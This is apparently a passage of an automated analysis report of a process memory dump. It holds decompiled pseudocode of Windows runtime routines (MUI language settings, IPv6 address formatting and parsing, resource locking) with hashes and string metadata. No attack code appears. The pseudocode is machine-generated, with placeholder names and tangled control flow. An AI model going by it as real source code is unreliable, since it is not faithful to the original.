                                                      							_t329 = 0xc0000017;
                                                      							goto L47;
                                                      						} else {
                                                      							E00882340(_v32, _v8, _v24);
                                                      							_v16 = _v32;
                                                      							_a4 = _t318;
                                                      							_t235 = E0089E679(_v32, _t332);
                                                      							while(1) {
                                                      								_t319 = _t235;
                                                      								if(_t319 == 0) {
                                                      									break;
                                                      								}
                                                      								 *_t319 = 0;
                                                      								_t321 = _t319 + 2;
                                                      								E0088E2A8(_t322,  &_v68, _v16);
                                                      								if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
                                                      									_a4 = _a4 + 1;
                                                      								}
                                                      								_v16 = _t321;
                                                      								_t235 = E0089E679(_t321, _t332);
                                                      								_pop(_t322);
                                                      							}
                                                      							_t236 = _v16;
                                                      							if( *_v16 != _t319) {
                                                      								E0088E2A8(_t322,  &_v68, _t236);
                                                      								if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
                                                      									_a4 = _a4 + 1;
                                                      								}
                                                      							}
                                                      							if(_a4 == 0) {
                                                      								E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                      								_v52 = _v52 & 0x00000000;
                                                      								_v32 = _v32 & 0x00000000;
                                                      							}
                                                      							if(_v8 != 0) {
                                                      								E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                      							}
                                                      							_v8 = _v8 & 0x00000000;
                                                      							_t318 = 0;
                                                      							goto L46;
                                                      						}
                                                      					}
                                                      					_t257 = _v24;
                                                      					_t322 = _t257 + 4;
                                                      					_push(_t257);
                                                      					_v40 = _t322;
                                                      					E008A718A(_t257);
                                                      					_t338 = _t335 + 4;
                                                      					if(_t322 == _t318) {
                                                      						_v20 = _t318;
                                                      					} else {
                                                      						_v20 = E0088E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      					}
                                                      					if(_v20 == _t318) {
                                                      						_v40 = _t318;
                                                      						goto L58;
                                                      					} else {
                                                      						E00882340(_v20, _v8, _v24);
                                                      						_v16 = _v20;
                                                      						_a4 = _t318;
                                                      						_t261 = E0089E679(_v20, _t332);
                                                      						_t335 = _t338 + 0x14;
                                                      						while(1) {
                                                      							_v12 = _t261;
                                                      							if(_t261 == _t318) {
                                                      								break;
                                                      							}
                                                      							_v12 = _v12 + 2;
                                                      							 *_v12 = 0;
                                                      							E0088E2A8(_v12,  &_v68, _v16);
                                                      							if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
                                                      								_a4 = _a4 + 1;
                                                      							}
                                                      							_v16 = _v12;
                                                      							_t261 = E0089E679(_v12, _t332);
                                                      							_pop(_t322);
                                                      						}
                                                      						_t269 = _v16;
                                                      						if( *_v16 != _t318) {
                                                      							E0088E2A8(_t322,  &_v68, _t269);
                                                      							if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
                                                      								_a4 = _a4 + 1;
                                                      							}
                                                      						}
                                                      						if(_a4 == _t318) {
                                                      							E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                      							_v40 = _t318;
                                                      							_v20 = _t318;
                                                      						}
                                                      						if(_v8 != _t318) {
                                                      							E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      						}
                                                      						_v8 = _t318;
                                                      						goto L30;
                                                      					}
                                                      				}
                                                      				_t284 = _v24;
                                                      				_t322 = _t284 + 4;
                                                      				_push(_t284);
                                                      				_v48 = _t322;
                                                      				E008A718A(_t284);
                                                      				_t339 = _t335 + 4;
                                                      				if(_t322 == _t318) {
                                                      					_v28 = _t318;
                                                      				} else {
                                                      					_v28 = E0088E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      				}
                                                      				if(_v28 == _t318) {
                                                      					_v48 = _t318;
                                                      					goto L58;
                                                      				} else {
                                                      					E00882340(_v28, _v8, _v24);
                                                      					_v16 = _v28;
                                                      					_a4 = _t318;
                                                      					_t288 = E0089E679(_v28, _t332);
                                                      					_t335 = _t339 + 0x14;
                                                      					while(1) {
                                                      						_v12 = _t288;
                                                      						if(_t288 == _t318) {
                                                      							break;
                                                      						}
                                                      						_v12 = _v12 + 2;
                                                      						 *_v12 = 0;
                                                      						E0088E2A8(_v12,  &_v68, _v16);
                                                      						if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
                                                      							_a4 = _a4 + 1;
                                                      						}
                                                      						_v16 = _v12;
                                                      						_t288 = E0089E679(_v12, _t332);
                                                      						_pop(_t322);
                                                      					}
                                                      					_t296 = _v16;
                                                      					if( *_v16 != _t318) {
                                                      						E0088E2A8(_t322,  &_v68, _t296);
                                                      						if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
                                                      							_a4 = _a4 + 1;
                                                      						}
                                                      					}
                                                      					if(_a4 == _t318) {
                                                      						E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                      						_v48 = _t318;
                                                      						_v28 = _t318;
                                                      					}
                                                      					if(_v8 != _t318) {
                                                      						E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      					}
                                                      					_v8 = _t318;
                                                      					goto L17;
                                                      				}
                                                      			}





































                                                      0x008f1b5b
                                                      0x008f1b5b
                                                      0x008a88c5
                                                      0x008a88ce
                                                      0x008a88e0
                                                      0x008a88e5
                                                      0x008a88e8
                                                      0x008a88e8
                                                      0x008a88ee
                                                      0x008a8900
                                                      0x008a8900
                                                      0x008a8905
                                                      0x00000000
                                                      0x008a8905

                                                      APIs
                                                      Strings
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 008A8914
                                                      • WindowsExcludedProcs, xrefs: 008A87C1
                                                      • Kernel-MUI-Language-SKU, xrefs: 008A89FC
                                                      • Kernel-MUI-Language-Allowed, xrefs: 008A8827
                                                      • Kernel-MUI-Number-Allowed, xrefs: 008A87E6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: _wcspbrk
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 402402107-258546922
                                                      • Opcode ID: df8f2c5f109eda0afed49c87601ec1f2a2b10895b0cd85d2615bee60d0e9906f
                                                      • Instruction ID: 989b61ecee265fce2babca7afe7351708cb19c59eed55a9116b792e6efbcda00
                                                      • Opcode Fuzzy Hash: df8f2c5f109eda0afed49c87601ec1f2a2b10895b0cd85d2615bee60d0e9906f
                                                      • Instruction Fuzzy Hash: 41F108B2D00209EFDF11EFA8C9819EEBBB8FF09304F14446AE505E7611EB359A45DB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 38%
                                                      			E008C13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				char _v24;
                                                      				intOrPtr _t71;
                                                      				signed int _t78;
                                                      				signed int _t86;
                                                      				char _t90;
                                                      				signed int _t91;
                                                      				signed int _t96;
                                                      				intOrPtr _t108;
                                                      				signed int _t114;
                                                      				void* _t115;
                                                      				intOrPtr _t128;
                                                      				intOrPtr* _t129;
                                                      				void* _t130;
                                                      
                                                      				_t129 = _a4;
                                                      				_t128 = _a8;
                                                      				_t116 = 0;
                                                      				_t71 = _t128 + 0x5c;
                                                      				_v8 = 8;
                                                      				_v20 = _t71;
                                                      				if( *_t129 == 0) {
                                                      					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                      						goto L5;
                                                      					} else {
                                                      						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                      						if(_t96 != 0) {
                                                      							L38:
                                                      							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                      								goto L5;
                                                      							} else {
                                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                                      								_t86 = E008B7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                      								L36:
                                                      								return _t128 + _t86 * 2;
                                                      							}
                                                      						}
                                                      						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                      						if(_t114 == 0) {
                                                      							L33:
                                                      							_t115 = 0x882926;
                                                      							L35:
                                                      							_push( *(_t129 + 0xf) & 0x000000ff);
                                                      							_push( *(_t129 + 0xe) & 0x000000ff);
                                                      							_push( *(_t129 + 0xd) & 0x000000ff);
                                                      							_push( *(_t129 + 0xc) & 0x000000ff);
                                                      							_t86 = E008B7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                      							goto L36;
                                                      						}
                                                      						if(_t114 != 0xffff) {
                                                      							_t116 = 0;
                                                      							goto L38;
                                                      						}
                                                      						if(_t114 != 0) {
                                                      							_t115 = 0x889cac;
                                                      							goto L35;
                                                      						}
                                                      						goto L33;
                                                      					}
                                                      				} else {
                                                      					L5:
                                                      					_a8 = _t116;
                                                      					_a4 = _t116;
                                                      					_v12 = _t116;
                                                      					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                      						if( *(_t129 + 0xa) == 0xfe5e) {
                                                      							_v8 = 6;
                                                      						}
                                                      					}
                                                      					_t90 = _v8;
                                                      					if(_t90 <= _t116) {
                                                      						L11:
                                                      						if(_a8 - _a4 <= 1) {
                                                      							_a8 = _t116;
                                                      							_a4 = _t116;
                                                      						}
                                                      						_t91 = 0;
                                                      						if(_v8 <= _t116) {
                                                      							L22:
                                                      							if(_v8 < 8) {
                                                      								_push( *(_t129 + 0xf) & 0x000000ff);
                                                      								_push( *(_t129 + 0xe) & 0x000000ff);
                                                      								_push( *(_t129 + 0xd) & 0x000000ff);
                                                      								_t128 = _t128 + E008B7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                      							}
                                                      							return _t128;
                                                      						} else {
                                                      							L14:
                                                      							L14:
                                                      							if(_a4 > _t91 || _t91 >= _a8) {
                                                      								if(_t91 != _t116 && _t91 != _a8) {
                                                      									_push(":");
                                                      									_push(_t71 - _t128 >> 1);
                                                      									_push(_t128);
                                                      									_t128 = _t128 + E008B7707() * 2;
                                                      									_t71 = _v20;
                                                      									_t130 = _t130 + 0xc;
                                                      								}
                                                      								_t78 = E008B7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                      								_t130 = _t130 + 0x10;
                                                      							} else {
                                                      								_push(L"::");
                                                      								_push(_t71 - _t128 >> 1);
                                                      								_push(_t128);
                                                      								_t78 = E008B7707();
                                                      								_t130 = _t130 + 0xc;
                                                      								_t91 = _a8 - 1;
                                                      							}
                                                      							_t91 = _t91 + 1;
                                                      							_t128 = _t128 + _t78 * 2;
                                                      							_t71 = _v20;
                                                      							if(_t91 >= _v8) {
                                                      								goto L22;
                                                      							}
                                                      							_t116 = 0;
                                                      							goto L14;
                                                      						}
                                                      					} else {
                                                      						_t108 = 1;
                                                      						_v16 = _t129;
                                                      						_v24 = _t90;
                                                      						do {
                                                      							if( *_v16 == _t116) {
                                                      								if(_t108 - _v12 > _a8 - _a4) {
                                                      									_a4 = _v12;
                                                      									_a8 = _t108;
                                                      								}
                                                      								_t116 = 0;
                                                      							} else {
                                                      								_v12 = _t108;
                                                      							}
                                                      							_v16 = _v16 + 2;
                                                      							_t108 = _t108 + 1;
                                                      							_t26 =  &_v24;
                                                      							 *_t26 = _v24 - 1;
                                                      						} while ( *_t26 != 0);
                                                      						goto L11;
                                                      					}
                                                      				}
                                                      			}





















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
                                                      • Instruction ID: 0d6d8136181e595b8646191786bf4fa643aa54d88bd7356b9060577c63683265
                                                      • Opcode Fuzzy Hash: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
                                                      • Instruction Fuzzy Hash: 5D610571900695AACF28DF69C8C4CBEBBB6FF96304718C16DE4D6C7642D634EA40CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E008C0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				void* _t108;
                                                      				void* _t116;
                                                      				char _t120;
                                                      				short _t121;
                                                      				void* _t128;
                                                      				intOrPtr* _t130;
                                                      				char _t132;
                                                      				short _t133;
                                                      				intOrPtr _t141;
                                                      				signed int _t156;
                                                      				signed int _t174;
                                                      				intOrPtr _t177;
                                                      				intOrPtr* _t179;
                                                      				intOrPtr _t180;
                                                      				void* _t183;
                                                      
                                                      				_t179 = _a4;
                                                      				_t141 =  *_t179;
                                                      				_v16 = 0;
                                                      				_v28 = 0;
                                                      				_v8 = 0;
                                                      				_v24 = 0;
                                                      				_v12 = 0;
                                                      				_v32 = 0;
                                                      				_v20 = 0;
                                                      				if(_t141 == 0) {
                                                      					L41:
                                                      					 *_a8 = _t179;
                                                      					_t180 = _v24;
                                                      					if(_t180 != 0) {
                                                      						if(_t180 != 3) {
                                                      							goto L6;
                                                      						}
                                                      						_v8 = _v8 + 1;
                                                      					}
                                                      					_t174 = _v32;
                                                      					if(_t174 == 0) {
                                                      						if(_v8 == 7) {
                                                      							goto L43;
                                                      						}
                                                      						goto L6;
                                                      					}
                                                      					L43:
                                                      					if(_v16 != 1) {
                                                      						if(_v16 != 2) {
                                                      							goto L6;
                                                      						}
                                                      						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                      						L47:
                                                      						if(_t174 != 0) {
                                                      							E00898980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                      							_t116 = 8;
                                                      							L0088DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                      						}
                                                      						return 0;
                                                      					}
                                                      					if(_t180 != 0) {
                                                      						if(_v12 > 3) {
                                                      							goto L6;
                                                      						}
                                                      						_t120 = E008C0CFA(_v28, 0, 0xa);
                                                      						_t183 = _t183 + 0xc;
                                                      						if(_t120 > 0xff) {
                                                      							goto L6;
                                                      						}
                                                      						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                      						goto L47;
                                                      					}
                                                      					if(_v12 > 4) {
                                                      						goto L6;
                                                      					}
                                                      					_t121 = E008C0CFA(_v28, _t180, 0x10);
                                                      					_t183 = _t183 + 0xc;
                                                      					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                      					goto L47;
                                                      				} else {
                                                      					while(1) {
                                                      						_t123 = _v16;
                                                      						if(_t123 == 0) {
                                                      							goto L7;
                                                      						}
                                                      						_t108 = _t123 - 1;
                                                      						if(_t108 != 0) {
                                                      							goto L1;
                                                      						}
                                                      						_t178 = _t141;
                                                      						if(E008C06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                      							if(E008C06BA(_t135, _t178) == 0 || E008C0A5B(_t136, _t178) == 0) {
                                                      								if(_t141 != 0x3a) {
                                                      									if(_t141 == 0x2e) {
                                                      										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                      											goto L41;
                                                      										} else {
                                                      											_v24 = _v24 + 1;
                                                      											L27:
                                                      											_v16 = _v16 & 0x00000000;
                                                      											L28:
                                                      											if(_v28 == 0) {
                                                      												goto L20;
                                                      											}
                                                      											_t177 = _v24;
                                                      											if(_t177 != 0) {
                                                      												if(_v12 > 3) {
                                                      													L6:
                                                      													return 0xc000000d;
                                                      												}
                                                      												_t132 = E008C0CFA(_v28, 0, 0xa);
                                                      												_t183 = _t183 + 0xc;
                                                      												if(_t132 > 0xff) {
                                                      													goto L6;
                                                      												}
                                                      												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                      												goto L20;
                                                      											}
                                                      											if(_v12 > 4) {
                                                      												goto L6;
                                                      											}
                                                      											_t133 = E008C0CFA(_v28, 0, 0x10);
                                                      											_t183 = _t183 + 0xc;
                                                      											_v20 = _v20 + 1;
                                                      											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                      											goto L20;
                                                      										}
                                                      									}
                                                      									goto L41;
                                                      								}
                                                      								if(_v24 > 0 || _v8 > 6) {
                                                      									goto L41;
                                                      								} else {
                                                      									_t130 = _t179 + 1;
                                                      									if( *_t130 == _t141) {
                                                      										if(_v32 != 0) {
                                                      											goto L41;
                                                      										}
                                                      										_v32 = _v8 + 1;
                                                      										_t156 = 2;
                                                      										_v8 = _v8 + _t156;
                                                      										L34:
                                                      										_t179 = _t130;
                                                      										_v16 = _t156;
                                                      										goto L28;
                                                      									}
                                                      									_v8 = _v8 + 1;
                                                      									goto L27;
                                                      								}
                                                      							} else {
                                                      								_v12 = _v12 + 1;
                                                      								if(_v24 > 0) {
                                                      									goto L41;
                                                      								}
                                                      								_a7 = 1;
                                                      								goto L20;
                                                      							}
                                                      						} else {
                                                      							_v12 = _v12 + 1;
                                                      							L20:
                                                      							_t179 = _t179 + 1;
                                                      							_t141 =  *_t179;
                                                      							if(_t141 == 0) {
                                                      								goto L41;
                                                      							}
                                                      							continue;
                                                      						}
                                                      						L7:
                                                      						if(_t141 == 0x3a) {
                                                      							if(_v24 > 0 || _v8 > 0) {
                                                      								goto L41;
                                                      							} else {
                                                      								_t130 = _t179 + 1;
                                                      								if( *_t130 != _t141) {
                                                      									goto L41;
                                                      								}
                                                      								_v20 = _v20 + 1;
                                                      								_t156 = 2;
                                                      								_v32 = 1;
                                                      								_v8 = _t156;
                                                      								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                      								goto L34;
                                                      							}
                                                      						}
                                                      						L8:
                                                      						if(_v8 > 7) {
                                                      							goto L41;
                                                      						}
                                                      						_t142 = _t141;
                                                      						if(E008C06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                      							if(E008C06BA(_t124, _t142) == 0 || E008C0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                      								goto L41;
                                                      							} else {
                                                      								_t128 = 1;
                                                      								_a7 = 1;
                                                      								_v28 = _t179;
                                                      								_v16 = 1;
                                                      								_v12 = 1;
                                                      								L39:
                                                      								if(_v16 == _t128) {
                                                      									goto L20;
                                                      								}
                                                      								goto L28;
                                                      							}
                                                      						} else {
                                                      							_a7 = 0;
                                                      							_v28 = _t179;
                                                      							_v16 = 1;
                                                      							_v12 = 1;
                                                      							goto L20;
                                                      						}
                                                      					}
                                                      				}
                                                      				L1:
                                                      				_t123 = _t108 == 1;
                                                      				if(_t108 == 1) {
                                                      					goto L8;
                                                      				}
                                                      				_t128 = 1;
                                                      				goto L39;
                                                      			}


























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: __fassign
                                                      • String ID: .$:$:
                                                      • API String ID: 3965848254-2308638275
                                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                      • Instruction ID: 8fd7c43a5d879553d9dd3548392db894cefb4e9d4a80d6b0b37766c991082b52
                                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                      • Instruction Fuzzy Hash: 3AA19B71D0031AEBCB24DFA8C845BAEB7B4FB05395F24856ED842E7282D630DA41CF52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 49%
                                                      			E008C0554(signed int _a4, char _a8) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int* _t49;
                                                      				signed int _t51;
                                                      				signed int _t56;
                                                      				signed int _t58;
                                                      				signed int _t61;
                                                      				signed int _t63;
                                                      				void* _t66;
                                                      				intOrPtr _t67;
                                                      				signed int _t70;
                                                      				void* _t75;
                                                      				signed int _t81;
                                                      				signed int _t84;
                                                      				void* _t86;
                                                      				signed int _t93;
                                                      				signed int _t96;
                                                      				intOrPtr _t105;
                                                      				signed int _t107;
                                                      				void* _t110;
                                                      				signed int _t115;
                                                      				signed int* _t119;
                                                      				void* _t125;
                                                      				void* _t126;
                                                      				signed int _t128;
                                                      				signed int _t130;
                                                      				signed int _t138;
                                                      				signed int _t144;
                                                      				void* _t158;
                                                      				void* _t159;
                                                      				void* _t160;
                                                      
                                                      				_t96 = _a4;
                                                      				_t115 =  *(_t96 + 0x28);
                                                      				_push(_t138);
                                                      				if(_t115 < 0) {
                                                      					_t105 =  *[fs:0x18];
                                                      					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                      					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                      						goto L6;
                                                      					} else {
                                                      						__eflags = _t115 | 0xffffffff;
                                                      						asm("lock xadd [eax], edx");
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					L6:
                                                      					_push(_t128);
                                                      					while(1) {
                                                      						L7:
                                                      						__eflags = _t115;
                                                      						if(_t115 >= 0) {
                                                      							break;
                                                      						}
                                                      						__eflags = _a8;
                                                      						if(_a8 == 0) {
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						} else {
                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                      							_t49 = _t96 + 0x1c;
                                                      							_t106 = 1;
                                                      							asm("lock xadd [edx], ecx");
                                                      							_t115 =  *(_t96 + 0x28);
                                                      							__eflags = _t115;
                                                      							if(_t115 < 0) {
                                                      								L23:
                                                      								_t130 = 0;
                                                      								__eflags = 0;
                                                      								while(1) {
                                                      									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                      									asm("sbb esi, esi");
                                                      									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009601c0;
                                                      									_push(_t144);
                                                      									_push(0);
                                                      									_t51 = E0087F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                      									__eflags = _t51 - 0x102;
                                                      									if(_t51 != 0x102) {
                                                      										break;
                                                      									}
                                                      									_t106 =  *(_t144 + 4);
                                                      									_t126 =  *_t144;
                                                      									_t86 = L008C4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                      									_push(_t126);
                                                      									_push(_t86);
                                                      									L008D3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                      									L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                      									_t130 = _t130 + 1;
                                                      									_t160 = _t158 + 0x28;
                                                      									__eflags = _t130 - 2;
                                                      									if(__eflags > 0) {
                                                      										E0090217A(_t106, __eflags, _t96);
                                                      									}
                                                      									_push("RTL: Re-Waiting\n");
                                                      									_push(0);
                                                      									_push(0x65);
                                                      									L008D3F92();
                                                      									_t158 = _t160 + 0xc;
                                                      								}
                                                      								__eflags = _t51;
                                                      								if(__eflags < 0) {
                                                      									_push(_t51);
                                                      									E008C3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                      									asm("int3");
                                                      									while(1) {
                                                      										L32:
                                                      										__eflags = _a8;
                                                      										if(_a8 == 0) {
                                                      											break;
                                                      										}
                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                      										_t119 = _t96 + 0x24;
                                                      										_t107 = 1;
                                                      										asm("lock xadd [eax], ecx");
                                                      										_t56 =  *(_t96 + 0x28);
                                                      										_a4 = _t56;
                                                      										__eflags = _t56;
                                                      										if(_t56 != 0) {
                                                      											L40:
                                                      											_t128 = 0;
                                                      											__eflags = 0;
                                                      											while(1) {
                                                      												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                      												asm("sbb esi, esi");
                                                      												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009601c0;
                                                      												_push(_t138);
                                                      												_push(0);
                                                      												_t58 = E0087F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                      												__eflags = _t58 - 0x102;
                                                      												if(_t58 != 0x102) {
                                                      													break;
                                                      												}
                                                      												_t107 =  *(_t138 + 4);
                                                      												_t125 =  *_t138;
                                                      												_t75 = L008C4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                      												_push(_t125);
                                                      												_push(_t75);
                                                      												L008D3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                      												L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                      												_t128 = _t128 + 1;
                                                      												_t159 = _t158 + 0x28;
                                                      												__eflags = _t128 - 2;
                                                      												if(__eflags > 0) {
                                                      													E0090217A(_t107, __eflags, _t96);
                                                      												}
                                                      												_push("RTL: Re-Waiting\n");
                                                      												_push(0);
                                                      												_push(0x65);
                                                      												L008D3F92();
                                                      												_t158 = _t159 + 0xc;
                                                      											}
                                                      											__eflags = _t58;
                                                      											if(__eflags < 0) {
                                                      												_push(_t58);
                                                      												E008C3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                      												asm("int3");
                                                      												_t61 =  *_t107;
                                                      												 *_t107 = 0;
                                                      												__eflags = _t61;
                                                      												if(_t61 == 0) {
                                                      													L1:
                                                      													_t63 = E008A5384(_t138 + 0x24);
                                                      													if(_t63 != 0) {
                                                      														goto L52;
                                                      													} else {
                                                      														goto L2;
                                                      													}
                                                      												} else {
                                                      													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                      													_push( &_a4);
                                                      													_push(_t61);
                                                      													_t70 = E0087F970( *((intOrPtr*)(_t138 + 0x18)));
                                                      													__eflags = _t70;
                                                      													if(__eflags >= 0) {
                                                      														goto L1;
                                                      													} else {
                                                      														_push(_t70);
                                                      														E008C3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                      														L52:
                                                      														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                      														_push( &_a4);
                                                      														_push(1);
                                                      														_t63 = E0087F970( *((intOrPtr*)(_t138 + 0x20)));
                                                      														__eflags = _t63;
                                                      														if(__eflags >= 0) {
                                                      															L2:
                                                      															return _t63;
                                                      														} else {
                                                      															_push(_t63);
                                                      															E008C3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                      															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                      															_push( &_a4);
                                                      															_push(1);
                                                      															_t63 = E0087F970( *((intOrPtr*)(_t138 + 0x20)));
                                                      															__eflags = _t63;
